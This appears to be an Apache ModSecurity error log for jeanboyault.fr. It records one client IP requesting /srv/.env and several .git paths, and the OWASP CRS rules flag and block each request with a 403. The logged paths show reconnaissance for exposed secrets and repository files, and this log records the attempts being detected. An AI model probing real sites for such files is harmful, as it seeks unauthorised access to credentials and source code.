[Mon May 11 11:42:43.931082 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:6216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env"] [unique_id "agGkkxjZymfuKpjWXeh5dwAAAME"]
[Mon May 11 11:42:43.931509 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:6216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/srv/.env"] [unique_id "agGkkxjZymfuKpjWXeh5dwAAAME"]
[Mon May 11 11:42:45.146969 2026] [security2:error] [pid 1254133:tid 1254136] [client 185.177.72.9:6216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkkxjZymfuKpjWXeh5dwAAAME"]
[Mon May 11 11:42:48.097132 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:6238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/HEAD"] [unique_id "agGkmJkIEwRJMyDaV55LeQAAAVc"]
[Mon May 11 11:42:48.097684 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:6238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/HEAD"] [unique_id "agGkmJkIEwRJMyDaV55LeQAAAVc"]
[Mon May 11 11:42:49.946762 2026] [security2:error] [pid 1256241:tid 1256269] [client 185.177.72.9:6238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkmJkIEwRJMyDaV55LeQAAAVc"]
[Mon May 11 11:42:49.979858 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:6250] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/HEAD"] [unique_id "agGkmUYQeUtAPynIs6xVVwAAAAw"]
[Mon May 11 11:42:49.980717 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:6250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/HEAD"] [unique_id "agGkmUYQeUtAPynIs6xVVwAAAAw"]
[Mon May 11 11:42:51.921108 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:6250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkmUYQeUtAPynIs6xVVwAAAAw"]
[Mon May 11 11:42:51.947263 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:6262] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/index"] [unique_id "agGkm0YQeUtAPynIs6xVWAAAABU"]
[Mon May 11 11:42:51.949311 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:6262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/index"] [unique_id "agGkm0YQeUtAPynIs6xVWAAAABU"]
[Mon May 11 11:42:53.171491 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:6262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkm0YQeUtAPynIs6xVWAAAABU"]
[Mon May 11 11:42:53.197356 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:56424] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/index"] [unique_id "agGknUYQeUtAPynIs6xVWQAAABE"]
[Mon May 11 11:42:53.197567 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:56424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/index"] [unique_id "agGknUYQeUtAPynIs6xVWQAAABE"]
[Mon May 11 11:42:54.619327 2026] [security2:error] [pid 1254212:tid 1254231] [client 185.177.72.9:56424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGknUYQeUtAPynIs6xVWQAAABE"]
[Mon May 11 11:42:54.646000 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:56436] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/hooks"] [unique_id "agGknpkIEwRJMyDaV55LfwAAAVA"]
[Mon May 11 11:42:54.646227 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:56436] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/hooks"] [unique_id "agGknpkIEwRJMyDaV55LfwAAAVA"]
[Mon May 11 11:42:56.029477 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:56436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGknpkIEwRJMyDaV55LfwAAAVA"]
[Mon May 11 11:42:56.069366 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:56452] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/hooks"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks"] [unique_id "agGkoERdw2n9wv6Ai48E2AAAAIc"]
[Mon May 11 11:42:56.070064 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:56452] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/hooks"] [unique_id "agGkoERdw2n9wv6Ai48E2AAAAIc"]
[Mon May 11 11:42:57.307182 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:56452] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkoERdw2n9wv6Ai48E2AAAAIc"]
[Mon May 11 11:42:57.352168 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:56460] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/packed-refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/packed-refs"] [unique_id "agGkoWS6k_SCYd1AVZqrpwAAAQg"]
[Mon May 11 11:42:57.352384 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:56460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/packed-refs"] [unique_id "agGkoWS6k_SCYd1AVZqrpwAAAQg"]
[Mon May 11 11:42:58.516629 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:56460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkoWS6k_SCYd1AVZqrpwAAAQg"]
[Mon May 11 11:42:58.543110 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:56470] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/packed-refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/packed-refs"] [unique_id "agGkokYQeUtAPynIs6xVXAAAAAc"]
[Mon May 11 11:42:58.543422 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:56470] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/packed-refs"] [unique_id "agGkokYQeUtAPynIs6xVXAAAAAc"]
[Mon May 11 11:42:59.762437 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:56470] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkokYQeUtAPynIs6xVXAAAAAc"]
[Mon May 11 11:42:59.788045 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:56472] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/objects"] [unique_id "agGko74KNmD_mZ_vlf81VAAAAEQ"]
[Mon May 11 11:42:59.788272 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:56472] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/objects"] [unique_id "agGko74KNmD_mZ_vlf81VAAAAEQ"]
[Mon May 11 11:43:00.980365 2026] [security2:error] [pid 1254242:tid 1254250] [client 185.177.72.9:56472] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGko74KNmD_mZ_vlf81VAAAAEQ"]
[Mon May 11 11:43:01.009932 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:56482] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects"] [unique_id "agGkpUYQeUtAPynIs6xVXgAAAAM"]
[Mon May 11 11:43:01.010507 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:56482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/objects"] [unique_id "agGkpUYQeUtAPynIs6xVXgAAAAM"]
[Mon May 11 11:43:02.216377 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:56482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkpUYQeUtAPynIs6xVXgAAAAM"]
[Mon May 11 11:43:02.241516 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:56490] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agGkpr4KNmD_mZ_vlf81VgAAAEM"]
[Mon May 11 11:43:02.241720 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:56490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agGkpr4KNmD_mZ_vlf81VgAAAEM"]
[Mon May 11 11:43:03.401631 2026] [security2:error] [pid 1254242:tid 1254249] [client 185.177.72.9:56490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkpr4KNmD_mZ_vlf81VgAAAEM"]
[Mon May 11 11:43:03.427820 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:65360] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agGkp74KNmD_mZ_vlf81VwAAAEI"]
[Mon May 11 11:43:03.428858 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:65360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agGkp74KNmD_mZ_vlf81VwAAAEI"]
[Mon May 11 11:43:04.948881 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:65360] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGkp74KNmD_mZ_vlf81VwAAAEI"]
